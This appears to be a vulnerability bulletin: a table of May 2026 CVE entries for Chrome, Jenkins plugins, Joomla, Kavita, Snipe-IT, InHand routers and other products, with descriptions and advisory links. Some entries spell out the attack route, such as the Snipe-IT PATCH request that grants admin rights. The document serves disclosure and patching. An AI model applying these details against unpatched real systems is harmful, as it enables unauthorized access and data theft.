| Google--Chrome | Inappropriate implementation in USB in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9976 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511732828 |
| Google--Chrome | Insufficient validation of untrusted input in WebShare in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9977 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511741173 |
| Google--Chrome | Use after free in Glic in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9978 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511741396 |
| Google--Chrome | Insufficient validation of untrusted input in Input in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9979 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511742228 |
| Google--Chrome | Insufficient validation of untrusted input in Printing in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9980 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511776372 |
| Google--Chrome | Inappropriate implementation in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9981 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/512995705 |
| Google--Chrome | Insufficient validation of untrusted input in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9982 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513001247 |
| Google--Chrome | Type Confusion in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9983 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513001309 |
| Google--Chrome | Use after free in UI in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9984 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513002543 |
| Google--Chrome | Insufficient validation of untrusted input in Media in Google Chrome on ChromeOS prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9985 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513019760 |
| Google--Chrome | Insufficient validation of untrusted input in OptimizationGuide in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9986 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513028160 |
| Google--Chrome | Insufficient validation of untrusted input in WebAppInstalls in Google Chrome on Android prior to 148.0.7778.216 allowed a local attacker to execute arbitrary code via a malicious file. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9987 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513046475 |
| Google--Chrome | Use after free in WebRTC in Google Chrome on Linux prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9988 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513049286 |
| Google--Chrome | Inappropriate implementation in Media in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to bypass same origin policy via a crafted video file. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9989 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513054053 |
| Google--Chrome | Use after free in WebAppInstalls in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9990 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513128608 |
| Google--Chrome | Inappropriate implementation in Media in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9991 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513173565 |
| Google--Chrome | Use after free in Network in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9992 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513177826 |
| Google--Chrome | Use after free in Views in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted PDF file. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9993 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513208588 |
| Google--Chrome | Use after free in Core in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9994 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513235131 |
| Google--Chrome | Use after free in WebXR in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9995 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513256572 |
| Google--Chrome | Out of bounds read in WebRTC in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9996 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513268100 |
| Google--Chrome | Use after free in Input in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9997 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513324041 |
| Google--Chrome | Integer overflow in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9998 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513337118 |
| Google--Chrome | Inappropriate implementation in ANGLE in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9999 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513364480 |
| Google--MCP Toolbox for Databases | Vulnerable to DNS rebinding attacks when using SSE (http://b/499408790). During the beta phase, we implemented `allowed-origins` and `allowed-hosts` flags to align with MCP security guidelines. However, the hardcoded `Access-Control-Allow-Origin: *` header in the SSE initialization handler was inadvertently retained. This vulnerability specifically impacts users connecting via Toolbox using SSE under specification v2024-11-05. | 2026-05-27 | not yet calculated | CVE-2026-9739 | https://github.com/googleapis/mcp-toolbox/issues/3053 https://github.com/googleapis/mcp-toolbox/pull/3054 |
| GOVCERT-LU--eml_parser | eml_parser serves as a python module for parsing eml files and returning various information found in the e-mail as well as computed information. Prior to 3.0.1, EmlParser.get_raw_body_text() recurses unconditionally for every nested message/rfc822 attachment without any depth limit. An attacker who can supply a badly crafted EML file with approximately 120 nested message/rfc822 parts triggers an unhandled RecursionError and aborts parsing of the message. A 12 KB EML file is enough to crash a worker. Though this causes the parser to crash, it is an unlikely scenario as the suggested EML that crashes the parser would not pass basic RFC compliance tests. This vulnerability is fixed in 3.0.1. | 2026-05-26 | not yet calculated | CVE-2026-44844 | https://github.com/GOVCERT-LU/eml_parser/security/advisories/GHSA-g47v-rwmh-r9f8 |
| GPAC--MP4Box | A NULL pointer dereference in GPAC MP4Box: when parsing certain truncated MP4 files, an unknown/invalid stsd entry can result in missing descriptor fields (e.g., codec/mime/profile strings). gf_media_map_esd then calls strlen() on a NULL pointer, triggering a crash (ASan SEGV). | 2026-05-27 | not yet calculated | CVE-2025-70116 | https://github.com/gpac/gpac/issues/3345 https://github.com/sigdevel/pocs/blob/main/res/gpac/MP4Box/68/68_gf_media_map_esd_media_tools_isom_tools_c_1364 https://infosec.exchange/@sigdevel/116624563750949972 |
| grokability--snipe-it | Snipe-IT is an IT asset/license management system. Prior to 8.4.1, aAn authenticated user with only users.edit permission can escalate their own privileges to admin by sending a PATCH request to /api/v1/users/{id} with permissions[admin]=1. The API controller only strips the superuser key from the permissions array, allowing admin and all other permission keys to be set by any user who can update users. This vulnerability is fixed in 8.4.1. | 2026-05-26 | not yet calculated | CVE-2026-44832 | https://github.com/grokability/snipe-it/security/advisories/GHSA-hq28-crg7-95pr https://github.com/grokability/snipe-it/commit/ce18ff669ceb0f0349749fd5d11c1d3d40b10569 |
| Hitachi Energy--MACH HiDraw | A heap-based buffer overflow vulnerability exists in XML parser functionality in the HiDraw. An authenticated malicious user with local access can exploit this vulnerability using a specially crafted XML file which may lead to memory corruption and potential arbitrary code execution. Successful exploitation could result in application crashes (denial of service) and compromise the confidentiality and integrity of the affected system. | 2026-05-26 | not yet calculated | CVE-2026-7310 | https://publisher.hitachienergy.com/preview?DocumentID=8DBD000248&LanguageCode=en&DocumentPartId=&Action=Launch |
| Hitachi Energy--RTU500 series CMU firmware | IEC 60870-5-104 used in bidirectional mode in RTU500 is vulnerable for a NULL pointer dereferencing, if a specially crafted sequence of messages is sent for a certain time, causing Denial of Service impact. Product is only affected if IEC 60870-5-104 functionality in bidirectional mode (BCI) is configured. | 2026-05-26 | not yet calculated | CVE-2026-8479 | https://publisher.hitachienergy.com/preview?DocumentID=8DBD000252&LanguageCode=en&DocumentPartId=&Action=Launch |
| IBM--Aspera HSTS for CP4I | IBM Aspera HSTS for CP4I 1.5.1 through 1.5.19 | 2026-05-27 | not yet calculated | CVE-2026-7876 | https://www.ibm.com/support/pages/node/7274127 |
| IBM--Business Automation Workflow containers and traditional | IBM Business Automation Workflow containers and traditional may leak information about its database structure in error messages. | 2026-05-27 | not yet calculated | CVE-2026-1248 | https://www.ibm.com/support/pages/node/7271445 |
| IBM--HTTP Server | IBM HTTP Server 8.5, and 9.0 | 2026-05-26 | not yet calculated | CVE-2026-9170 | https://www.ibm.com/support/pages/node/7274065 |
| IBM--OPENBMC | IBM OPENBMC FW1110.00 through FW1110.11 is vulnerable to denial of service attacks by unauthenticated network users. | 2026-05-27 | not yet calculated | CVE-2026-7254 | https://www.ibm.com/support/pages/node/7272993 |
| inducer--relate | RELATE is a web-based courseware package. Prior to commit d66ba5659b459bf1ba56b7109b5f9ecf197cbefb, RELATE LMS configures its Celery workers to accept and deserialize untrusted 'pickle' data. An attacker who can reach the message broker can execute arbitrary commands on the host server. Combined with missing network isolation in the code execution sandbox, this allows an authenticated student to achieve full Remote Code Execution (RCE) on the host system. Commit d66ba5659b459bf1ba56b7109b5f9ecf197cbefb fixes the issue. | 2026-05-27 | not yet calculated | CVE-2026-47161 | https://github.com/inducer/relate/security/advisories/GHSA-4mwh-mwv4-m252 https://github.com/inducer/relate/commit/d66ba5659b459bf1ba56b7109b5f9ecf197cbefb |
| InHand Networks--IPSec VPN | A command injection vulnerability exists in the IPSec VPN feature of InHand Networks IR302 firmware V3.5.108, IR305 firmware V1.0.118, IR315 firmware V1.0.118, IR615 firmware V1.0.118, and earlier versions. Attackers can exploit this vulnerability to obtain ROOT privileges on remote target devices. | 2026-05-28 | not yet calculated | CVE-2026-38707 | https://www.inhand.com/wp-content/uploads/InHand-PSA-2026-05_EN.pdf |
| InHand Networks--WireGuard VPN | A command injection vulnerability exists in the WireGuard VPN feature of InHand Networks IR302 firmware V3.5.108, IR305 firmware V1.0.118, IR315 firmware V1.0.118, IR615 firmware V1.0.118, and earlier versions. Attackers can exploit this vulnerability to obtain ROOT privileges on remote target devices. | 2026-05-28 | not yet calculated | CVE-2026-38704 | https://www.inhand.com/wp-content/uploads/InHand-PSA-2026-05_EN.pdf |
| InHands Networks--Admin Access Feature | A command injection vulnerability exists in the Admin Access feature of InHand Networks IR302 firmware V3.5.108, IR305 firmware V1.0.118, IR315 firmware V1.0.118, IR615 firmware V1.0.118, and earlier versions. Attackers can exploit this vulnerability to obtain ROOT privileges on remote target devices. | 2026-05-28 | not yet calculated | CVE-2026-38702 | https://www.inhand.com/wp-content/uploads/InHand-PSA-2026-05_EN.pdf |
| InHands Networks--ZeroTier VPN | A command injection vulnerability exists in the ZeroTier VPN feature of InHand Networks IR302 firmware V3.5.108, IR305 firmware V1.0.118, IR315 firmware V1.0.118, IR615 firmware V1.0.118, and earlier versions. Attackers can exploit this vulnerability to obtain ROOT privileges on remote target devices. | 2026-05-28 | not yet calculated | CVE-2026-38703 | https://www.inhand.com/wp-content/uploads/InHand-PSA-2026-05_EN.pdf |
| Intermesh--groupoffice | Group-Office is an enterprise customer relationship management and groupware tool. Prior to 26.0.25, 25.0.100, and 6.8.165, GroupOffice allows authenticated users to persist arbitrary legacy settings for any user_id via index.php?r=core/saveSetting. A separate client-side sink in the email module injects the email_font_size setting directly into JavaScript without escaping. By combining these two issues, any low-privileged authenticated user can overwrite an administrator's email_font_size setting with a JavaScript payload and trigger stored XSS in the administrator's browser when the GroupOffice web client loads views/Extjs3/modulescripts.php. This vulnerability is fixed in 26.0.25, 25.0.100, and 6.8.165. | 2026-05-29 | not yet calculated | CVE-2026-45551 | https://github.com/Intermesh/groupoffice/security/advisories/GHSA-9w92-p32g-g99p |
| iskorotkov--avro | iskorotkov/avro is a fast Go Avro codec. Prior to 2.33.0, several Avro decoder paths read attacker-controlled 64-bit values from the wire format and either narrowed them to platform-sized int before bounds-checking, or summed them with overflow-prone signed-int arithmetic. On 32-bit targets (GOARCH=386, arm, mips, wasm, etc.), the truncation paths can silently bypass byte-slice limits, select the wrong union branch, or hit the OCF negative-make panic via wrap. Three sub-issues are not 32-bit-specific: cumulative-size arithmetic overflow in arrayDecoder.Decode / mapDecoder.Decode / mapDecoderUnmarshaler.Decode (wraps at math.MaxInt64 on amd64 / arm64 and bypasses MaxSliceAllocSize / MaxMapAllocSize), math.MinInt negation in block-header handling, and make([]byte, size) with a negative size in OCF block reads - all three panic or bypass caps on any platform, giving an attacker a denial-of-service primitive there. This vulnerability is fixed in 2.33.0. | 2026-05-29 | not yet calculated | CVE-2026-46384 | https://github.com/iskorotkov/avro/security/advisories/GHSA-mc57-h6j3-3hmv |
| iskorotkov--avro | iskorotkov/avro is a fast Go Avro codec. Prior to 2.33.0, the Avro array and map decoders looped over an attacker-controlled block-count value without checking the underlying reader's error state inside the loop body. Reader.ReadBlockHeader returns the count as a Go int, which is 64-bit on amd64 / arm64 targets - so a producer can declare a block of up to math.MaxInt64 (~9.2 × 10¹â¸) elements followed by EOF (or any truncated payload), and the decoder will attempt that many no-op iterations before propagating the error. The realistic ceiling is "indefinite until the worker is killed externally" - a single hostile payload pins a CPU core until the process is OOM-killed, deadline-cancelled, or terminated. Remote, unauthenticated denial-of-service. This vulnerability is fixed in 2.33.0. | 2026-05-29 | not yet calculated | CVE-2026-46385 | https://github.com/iskorotkov/avro/security/advisories/GHSA-w8j3-pq8g-8m7w |
| Jason-2605 Admin Panel 4.0--Jason-2605 Admin Panel 4.0 | A Cross-Site Request Forgery (CSRF) vulnerability was discovered in the delete.php endpoint of Jason2605 AdminPanel 4.0. | 2026-05-27 | not yet calculated | CVE-2026-30498 | https://github.com/Mehdi-Ben-Hamou/CVE-2026-30498 |
| Jenkins Project--Jenkins Active Directory Plugin | Jenkins Active Directory Plugin 2.41 and earlier follows LDAP referrals by default. | 2026-05-27 | not yet calculated | CVE-2026-48918 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins Active Directory Plugin | Jenkins Active Directory Plugin 2.41 and earlier deserializes data from LDAP referrals without validation. | 2026-05-27 | not yet calculated | CVE-2026-48919 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins AppSpider Plugin | Jenkins AppSpider Plugin 1.0.17 and earlier does not perform a permission check in a method implementing form validation, allowing attackers with Overall/Read permission to connect to an attacker-specified URL. | 2026-05-27 | not yet calculated | CVE-2026-48923 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins Bitbucket OAuth Plugin | Jenkins Bitbucket OAuth Plugin 0.17 and earlier does not restrict the redirect URL after login, allowing attackers to perform phishing attacks. | 2026-05-27 | not yet calculated | CVE-2026-48924 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins buildgraph-view Plugin | Jenkins buildgraph-view Plugin 1.8 and earlier does not escape the build URL, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs or views. | 2026-05-27 | not yet calculated | CVE-2026-48927 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins Credentials Binding Plugin | Jenkins Credentials Binding Plugin 720.v3f6decef43ea_ and earlier does not properly sanitize file names for file and zip file credentials, allowing attackers able to provide credentials to a job to write files to arbitrary locations on the node filesystem, which can lead to remote code execution if Jenkins is configured to allow a low-privileged user to configure file or zip file credentials used for a job running on the built-in node. | 2026-05-27 | not yet calculated | CVE-2026-48922 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins Email Extension Plugin | Jenkins Email Extension Plugin 1933.v45cec755423f and earlier allows inlining images as `base64` in email content by setting the `data-inline` attribute, without restrictions on the image URLs that can be inlined, allowing attackers able to control the email content to specify `file:` URLs for images to read arbitrary files from the Jenkins controller filesystem. | 2026-05-27 | not yet calculated | CVE-2026-48920 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins GitHub Integration Plugin | A cross-site request forgery (CSRF) vulnerability in Jenkins GitHub Integration Plugin 0.7.3 and earlier allows attackers to attackers to trigger a build for a pull request. | 2026-05-27 | not yet calculated | CVE-2026-48925 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins Job Import Plugin | Jenkins Job Import Plugin 143.v044a_2e819b_27 and earlier does not perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. | 2026-05-27 | not yet calculated | CVE-2026-48926 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins LDAP Plugin | Jenkins LDAP Plugin 807.v7d7de30930cf and earlier follows LDAP referrals. | 2026-05-27 | not yet calculated | CVE-2026-48916 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins LDAP Plugin | Jenkins LDAP Plugin 807.v7d7de30930cf and earlier deserializes data from LDAP referrals without validation. | 2026-05-27 | not yet calculated | CVE-2026-48917 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins Multijob Plugin | A cross-site request forgery (CSRF) vulnerability in Jenkins Multijob Plugin 662.vd2e0001f6b_b_d and earlier allows attackers to resume failed Multijob builds. | 2026-05-27 | not yet calculated | CVE-2026-9674 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins Pipeline: Groovy Libraries Plugin | Jenkins Pipeline: Groovy Libraries Plugin 797.v90ea_a_9b_e45a_0 and earlier does not prohibit symbolic links in shared libraries, allowing attackers able to control the content of a library used by a Pipeline job to read arbitrary files on the Jenkins controller filesystem. | 2026-05-27 | not yet calculated | CVE-2026-48921 | Jenkins Security Advisory 2026-05-27 |
| jg-rp--liquid | Python Liquid is a Python engine for the Liquid template language. Prior to 2.2.0, the built-in FileSystemLoader and CachingFileSystemLoader do not guard against reading files outside their search paths when given an absolute path to resolve. This allows malicious template authors to load and render arbitrary files via the {% include %} and {% render %} tags. Targeted files would need to contain valid Liquid markup and be readable by the application process. This vulnerability is fixed in 2.2.0. | 2026-05-28 | not yet calculated | CVE-2026-45017 | https://github.com/jg-rp/liquid/security/advisories/GHSA-8p4x-wr7x-3788 |
| Joomla! Project--Joomla! CMS | Lack of output escaping leads to a XSS vector in the feed modules. | 2026-05-26 | not yet calculated | CVE-2026-25900 | https://developer.joomla.org/security-centre/1033-20260501-core-xss-in-feed-modules.html |
| Joomla! Project--Joomla! CMS | Lack of output escaping leads to a XSS vector in the multilingual associations component. | 2026-05-26 | not yet calculated | CVE-2026-25901 | https://developer.joomla.org/security-centre/1034-20260502-core-xss-in-com-associations.html |
| Joomla! Project--Joomla! CMS | Lack of output escaping leads to a XSS vector in the content history component. | 2026-05-26 | not yet calculated | CVE-2026-30894 | https://developer.joomla.org/security-centre/1035-20260503-core-xss-in-com-contenthistory |
| Joomla! Project--Joomla! CMS | Lack of output escaping leads to a XSS vector in the readmore links for com_content. | 2026-05-26 | not yet calculated | CVE-2026-30895 | https://developer.joomla.org/security-centre/1036-20260504-core-xss-in-readmore-links |
| Joomla! Project--Joomla! CMS | Lack of CSRF token validation lead to a CSRF attack vector in the admin activation endpoint of com_users. | 2026-05-26 | not yet calculated | CVE-2026-35220 | https://developer.joomla.org/security-centre/1037-20260505-core-csrf-in-user-activation-endpoint |
| Joomla! Project--Joomla! CMS | Improperly built filter clauses lead to a SQL injection vulnerability in the search query for com_finder. | 2026-05-26 | not yet calculated | CVE-2026-35221 | https://developer.joomla.org/security-centre/1038-20260506-core-authenticated-blind-sqli-in-com-finder.html |
| Joomla! Project--Joomla! CMS | Improperly validated order clauses lead to a SQL injection vulnerability in com_tags. | 2026-05-26 | not yet calculated | CVE-2026-35222 | https://developer.joomla.org/security-centre/1039-20260507-core-authenticated-blind-sqli-in-com-tags.html |
| Joomla! Project--Joomla! CMS | An improper access check allows unauthorized access to com_config webservice endpoints. | 2026-05-26 | not yet calculated | CVE-2026-35223 | https://developer.joomla.org/security-centre/1040-20260508-core-improper-access-check-in-com-config-webservice-endpoints.html |
| Joomla! Project--Joomla! CMS | An improper validation of user-supplied input leads to a local file inclusion vulnerability. | 2026-05-26 | not yet calculated | CVE-2026-40383 | https://developer.joomla.org/security-centre/1041-20260509-core-lfi-in-htmlview-layout-parameter.html |
| Joomla! Project--Joomla! CMS | An improper validation of the search parameter of the com_media files API endpoint leads to a path traversal vulnerability. | 2026-05-26 | not yet calculated | CVE-2026-40384 | https://developer.joomla.org/security-centre/1042-20260510-core-path-traversal-in-com-media-webservice-endpoint.html |
| Joomla! Project--Joomla! CMS | Insufficient state checks lead to a vector that allows to bypass 2FA checks. | 2026-05-26 | not yet calculated | CVE-2026-48896 | https://developer.joomla.org/security-centre/1043-20260511-core-mfa-authentication-bypass.html |
| Joomla! Project--Joomla! CMS | Insufficient state checks lead to a vector that allows to bypass 2FA checks. | 2026-05-26 | not yet calculated | CVE-2026-48897 | https://developer.joomla.org/security-centre/1044-20260512-core-mfa-authentication-bypass.html |
| Joomla! Project--Joomla! CMS | An improper access check allows privilege escalation through the com_users batch task. | 2026-05-26 | not yet calculated | CVE-2026-48898 | https://developer.joomla.org/security-centre/1045-20260513-core-privilege-escalation-through-com-users-batch-task.html |
| Joomla! Project--Joomla! CMS | An improper access check allows privilege escalation through the com_users batch task. | 2026-05-26 | not yet calculated | CVE-2026-48899 | https://developer.joomla.org/security-centre/1047-20260515-core-incorrect-access-control-in-sample-data-plugins.html |
| Joomla! Project--Joomla! CMS | An improper access check allowed low privileged users to edit the task types of existing scheduler tasks. | 2026-05-26 | not yet calculated | CVE-2026-48900 | https://developer.joomla.org/security-centre/1048-20260516-core-incorrect-access-control-in-com-scheduler.html |
| Joomla! Project--Joomla! CMS | The InputFilter::getInstance() method omitted a security sensitive parameter from the instance cache key. | 2026-05-26 | not yet calculated | CVE-2026-48901 | https://developer.joomla.org/security-centre/1049-20260517-core-incorrect-cache-key-construction-for-inputfilter-objects.html |
| Joomla! Project--Joomla! CMS | The password and username reset features created plain http links for https connections if the "Force SSL" flag wasn't explicitly set. | 2026-05-26 | not yet calculated | CVE-2026-48902 | https://developer.joomla.org/security-centre/1050-20260518-core-transport-encryption-downgrade-for-password-and-username-reset-links.html |
| Joomla! Project--Joomla! CMS | An improper access check allows privelege escalation through the com_users group editing webservice endpoint. | 2026-05-26 | not yet calculated | CVE-2026-48904 | https://developer.joomla.org/security-centre/1046-20260514-core-privilege-escalation-through-com-users-webservice-endpoints.html |
| Joomla! Project--Joomla! Framework Filter package | Inadequate content filtering within the checkAttribute methods leads to XSS vulnerabilities in various components. | 2026-05-26 | not yet calculated | CVE-2026-48903 | https://developer.joomla.org/security-centre/1051-20260519-framework-inadequate-content-filtering-within-the-checkattribute-filter-code.html |
| Joomla! Project--Joomla! Framework Filter package | Lack of input filtering leads to an XSS vector in the HTML filter code. | 2026-05-26 | not yet calculated | CVE-2026-48905 | https://developer.joomla.org/security-centre/1052-20260520-framework-inadequate-content-filtering-within-the-cleanattributes-filter-code.html |
| Kareadita--Kavita | Kavita is a cross platform reading server. Prior to 0.9.0, the ReaderController.GetImage endpoint is decorated with [AllowAnonymous], allowing completely unauthenticated access to page images from any chapter in any library. While the endpoint accepts an apiKey parameter, it is never validated. Since entity IDs are sequential integers, an unauthenticated attacker can trivially enumerate all content on the server. This vulnerability is fixed in 0.9.0. | 2026-05-26 | not yet calculated | CVE-2026-44775 | https://github.com/Kareadita/Kavita/security/advisories/GHSA-6gc9-6r8p-5wg2 https://github.com/Kareadita/Kavita/blob/8c686df2dbc2d0a83120e8b3f8c1269107bb815d/API/Controllers/ReaderController.cs#L116 |
| Kareadita--Kavita | Kavita is a cross platform reading server. Prior to 0.9.0, the download, size-check, and chapter metadata endpoints do not enforce library-level authorization. A low-privileged user who knows or guesses a chapterId, volumeId, or seriesId belonging to a library they are not assigned to can download the full file contents, query file sizes, and read metadata for that content. This affects /api/Download/volume-size, /api/Download/chapter-size, /api/Download/series-size, /api/Download/volume, /api/Download/chapter, /api/Download/series, and /api/Chapter. This vulnerability is fixed in 0.9.0. | 2026-05-26 | not yet calculated | CVE-2026-44776 | https://github.com/Kareadita/Kavita/security/advisories/GHSA-x3jq-95xw-gwvr |
| Kareadita--Kavita | Kavita is a cross platform reading server. Prior to 0.9.0.2, an Improper Token validation flaw permits a remote and unauthenticated threat actor to request a JWT for any user including admins given knowledge of their username. This vulnerability is fixed in 0.9.0.2. | 2026-05-26 | not yet calculated | CVE-2026-47202 | https://github.com/Kareadita/Kavita/security/advisories/GHSA-m2v3-fcjh-hm22 https://github.com/Kareadita/Kavita/releases/tag/v0.9.0.2 |
| Kenik--KG-5230TAS-IL-3 | Kenik Camera management Panel is vulnerable to Path Traversal vulnerability. An unauthenticated attacker can send GET request with arbitrary file path and read corresponding files located on the server. The issue was fixed in version 2026-04-23 of the KG-5260xxxx-IL-(G)2 cameras. Rest of the products were fixed in version 2025-04-21. | 2026-05-25 | not yet calculated | CVE-2026-7766 | https://cert.pl/posts/2026/05/CVE-2026-7766 |
| Kovah--LinkAce | LinkAce is a self-hosted archive to collect website links. Prior to 2.5.6, LinkAce contains an Insecure Direct Object Reference vulnerability in the authorization policy layer that allows any authenticated user to modify resources owned by other users. The affected resource types are links, lists, tags, and notes. Both the web UI and the REST API are vulnerable. The root cause is in the update() methods of all four model policies: LinkPolicy, LinkListPolicy, TagPolicy, and NotePolicy. Each delegates to an access-check method (e.g., userCanAccessLink()) that returns true for any resource with non-private visibility, regardless of who owns it. This means any registered user can edit any public or internal resource across the entire instance. The delete() methods in the same policy files correctly require ownership via $link->user->is($user), which confirms that update was intended to be owner-only. The same flaw exists in the API layer through AuthorizesUserApiActions::userCanUpdateModel(), which mirrors the broken visibility-only check instead of the ownership check used by userCanDeleteModel(). Bulk edit operations via BulkEditController are also affected. This vulnerability is fixed in 2.5.6. | 2026-05-28 | not yet calculated | CVE-2026-45342 | https://github.com/Kovah/LinkAce/security/advisories/GHSA-cj8f-h888-m57m |
